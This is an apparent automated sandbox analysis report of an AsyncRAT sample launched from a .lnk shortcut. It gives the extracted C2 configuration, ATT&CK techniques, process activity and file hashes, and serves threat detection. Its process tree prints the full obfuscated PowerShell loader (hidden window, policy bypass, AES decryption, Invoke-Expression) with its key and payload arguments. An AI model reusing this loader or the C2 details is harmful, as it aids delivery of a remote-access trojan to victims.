asyncrat | 3421a6ad1ac42363c9ba102916d4f7d78e323cca2a7b8c4a4ecc752820e55bdc

Analysis

max time kernel
209s
max time network
211s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
09-12-2024 19:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RunScriptProtected.lnk
Size

3KB
MD5

7d7b89cb7fa6155b1e01334175ac1c5b
SHA1

e777ad0ff4d4510ee345c06c34123b279b0b7ad6
SHA256

7c8be71b3cfef2de7343bd48d20e33a6f2f94409d59c50f5ac3a5bbd703789fc
SHA512

bd1ddf6149e7d51339ba326ad6fbd9d0b7eb4a2e6a0ca90cfd6a9024df0ee81e0cc2ac2e77e4c1b86146d4d06ccc24696c320d5ea166cf79d9062ff9d3b22038

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

alainlegrosper.ddns.net:6606

Mutex

sgXgvLmJ6SR3

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x00290000000450de-20.dat	family_asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
6	2412	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2412	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
3084	tmp80C9.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmp80C9.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133782477654852059"	chrome.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2412	powershell.exe
2412	powershell.exe
2160	chrome.exe
2160	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	3084	tmp80C9.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe
Token: SeShutdownPrivilege	2160	chrome.exe
Token: SeCreatePagefilePrivilege	2160	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe
2160	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3984 wrote to memory of 2412	3984	cmd.exe	81
PID 3984 wrote to memory of 2412	3984	cmd.exe	81
PID 2412 wrote to memory of 3084	2412	powershell.exe	82
PID 2412 wrote to memory of 3084	2412	powershell.exe	82
PID 2412 wrote to memory of 3084	2412	powershell.exe	82
PID 2160 wrote to memory of 2420	2160	chrome.exe	93
PID 2160 wrote to memory of 2420	2160	chrome.exe	93
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 840	2160	chrome.exe	94
PID 2160 wrote to memory of 1480	2160	chrome.exe	95
PID 2160 wrote to memory of 1480	2160	chrome.exe	95
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96
PID 2160 wrote to memory of 4028	2160	chrome.exe	96

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RunScriptProtected.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3984
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {param($a, $b) $KEYIV = '3Q1aUNn15Me1VlTQAQdGsm8ekXBkW2FFrSBt93j4N9Hg2QMZ60uGi6hdUECTkmywWn5vE4REAgxDeSoQIFpLq0zLiYkkC3WftAtNr6bgSVPoN2eYpSVCgq7FapPgUIfMZiDkS4Z7ibn7XIe6LuOlTPHS0ibnAmKQ5eCYXNZdOKzILr7TAIImXk5QH61FidAIOBZrbTQpHYRM98yNGmvMOzONCZQfuvr'; $command = [System.Convert]::FromBase64String($a); $key = [System.Convert]::FromBase64String($b); $e = New-Object System.Security.Cryptography.AesManaged; $e.Key = $key; $e.IV = $command[0..15]; $f = $e.CreateDecryptor(); $g = $f.TransformFinalBlock($command[16..$command.Length], 0, $command.Length - 16); $h = [System.Text.Encoding]::UTF8.GetString($g); Invoke-Expression $h; }" -a "qs9K8ECrxJ4RYgoGXBOVA5zoSztl2ZXPpldKefb9lZYVjASx3hpM1DG7Td3mzXA7B5gsnqQ74Cf8nu4rHbTQMgCpXtC7lraiyB1QP5NLcaIqIUGuJEX8Yeh6OaMu87mbALezjUugDAG8K6pcwYBuptmyjFZy3nos4aELD9IL8TOAxjBh/YryQcekOlA++MRBusflRl3EOvlALID34VFe304kjnyI10ZlLqUrqV3m7ag=" -b "I2gGFN92JQ7raC35ha14JzISlRbQCYzWrkxCskiY01c="
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2412
- - C:\Users\Admin\AppData\Local\Temp\tmp80C9.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp80C9.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffcf364cc40,0x7ffcf364cc4c,0x7ffcf364cc58
  2⤵
  PID:2420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2012 /prefetch:2
  2⤵
  PID:840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1924,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2100 /prefetch:3
  2⤵
  PID:1480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2280,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2452 /prefetch:8
  2⤵
  PID:4028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:1328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3224 /prefetch:1
  2⤵
  PID:3000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3672,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4520 /prefetch:1
  2⤵
  PID:4116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4684,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4860 /prefetch:8
  2⤵
  PID:3240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4864,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4884 /prefetch:8
  2⤵
  PID:3056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5128 /prefetch:8
  2⤵
  PID:2924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5112,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5084 /prefetch:8
  2⤵
  PID:5012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5136,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5320 /prefetch:8
  2⤵
  PID:3276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5204,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5444 /prefetch:8
  2⤵
  PID:4356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5596,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5272 /prefetch:2
  2⤵
  PID:780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5348,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5068 /prefetch:1
  2⤵
  PID:2096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=904,i,15420585009134460693,2349746859589072337,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1216 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:756

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:8

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
83ad4449f8239ff158fc022da9cecdbc

SHA1
947b1c68146eca1b19c1623b7ab42aba6dab223a

SHA256
fb391ffd902e9f4abb8ed25033f1faa3dc6b637792a361709e2d8a96eb980995

SHA512
ddc8654eb78cc705c987df6dabe538c6827a6fdae2c968b19b869c384e3ec68a6a7fc86ec7dec439de106fc4f72462a6065472e77b11e1fabf8fddee68864775

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
2be38925751dc3580e84c3af3a87f98d

SHA1
8a390d24e6588bef5da1d3db713784c11ca58921

SHA256
1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b

SHA512
1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
1b7830a5e7b2e2d044d8d09e89a96be7

SHA1
1b73acb802c1199617796558951d8e00e8cb5f57

SHA256
2cfac432f2749bfe951c4fadf6d8d5356289e384c1dd63146797d57b8e56a1ae

SHA512
59fecec0f50113aeb9d2e939f85fa2574bec9a384b3c903eca7b956be7931ec6bafc15c74ca09ae6489156d33ce036e6826de8b528aca860d14390556e6494ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
612c31d4efef3875c7ffd45ecf846c61

SHA1
79e542613c51ab2745c016d99126d8ba4a027c3f

SHA256
2a724cfbea5ede0ede0c3778731fca04a911fe63177a869e29f36013b04d050c

SHA512
2b8ae249d1c842957a71251e00629d68a71cce16b5e0c340a045ab13957093da2cb6831092a76abd0e45e1ea55ff74b9556199904567e200b55130ceda2a77c1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
337f79fe33a5b0206c93eef28222f487

SHA1
5fe5b51f71fc16bcd4113363d2537066652f3529

SHA256
a4e960a5dc5b7dccbabfc77883378f07ae0cd716e74421f9235fd32d750f12fc

SHA512
b3f10aa8ea6d8423c107fa9ee69b70b7c231884a2ebcc9a07cf97720cb3e0544cd4ae76986b4a6ec406fef388420d60b75589483aaeb28cb8da435dcb55150dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
967334fd7fd0c9c937caced1df6a7802

SHA1
dfc6fe0ae474e53ddb19a08a922c81f721962be7

SHA256
90e65598fcb4b98776a2688d2355dc44cb580016bbd81a5ecd28b9cac9545c42

SHA512
1a9d39f518e4221807d51aafd4276f0cc20e8bbc8069e067e7fe7cbee5ee973775fb5907cbd17aeec9a469c2d566d8ab4c51474bd7161f4fb26d1b34383757b5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
bea7d892b814836bfe0d4d61edc05341

SHA1
c54dda1ae992ec4b58e52750ae8187a11737ed5c

SHA256
90398177bf97a31bd092f872acdb8bc981f7a30408ec2fd2c11355f8768924f0

SHA512
06535fdbd5c8af98dff34cafd83604897cdcea176eba654ce2bc5d957c0c0473bd6cf17958bc23449f19ee516d91e54f9792a2919aeaf4892a6b95899beffdb7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
91d629254914455fc0ed6d1f3b452b7b

SHA1
fd5f80fe0f8ffd51b1808738d3c2fb24897261b0

SHA256
35543736c7f594265d93ad721e3671983a8f4ecf6e90571734fc8a84ab0d2310

SHA512
b796da7cbedf1acc4230e564fbd4137dbd34319aeb7a28252aad3cd4966db5a2ef1737f8c21cce16aa0af57e12138dda6f585d219d492798db99684cf8698598

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
40e53701b41d762e17ad072de592997a

SHA1
9abdf7f8ea4d74aad1aa987e11604f6468d740b0

SHA256
b6991e30a3d7f96e784e6fff4631f9dca29ff41c3ffceaca035f688b09da1ee0

SHA512
eb899b46b5d76ea248868c4f1605124a1472dca4c61aeac286310ae6c241e432828f0b5405c8a6ee2f1edc805943285cab8fbe543e44ac81e6baaf0bf9992ef6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2bbb34c65fc21b6009f449c1a6968c2d

SHA1
59302cdc511f06ed1fb71eb22393552934b26ce0

SHA256
637beee1db416769929312fd16095ad90b4b26f43a7cfc1565e126981a3f52ad

SHA512
544dfd5359a0413285022794c9f5368df1e3adbdb124db30c168f87e31b37d822d3182032e2ba1360c7b5eaa085ea0efc9fee5f30406f9ce1c8691c3fbcbd6e0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
0407af7c742258f4e7eed3c8dc99d6b8

SHA1
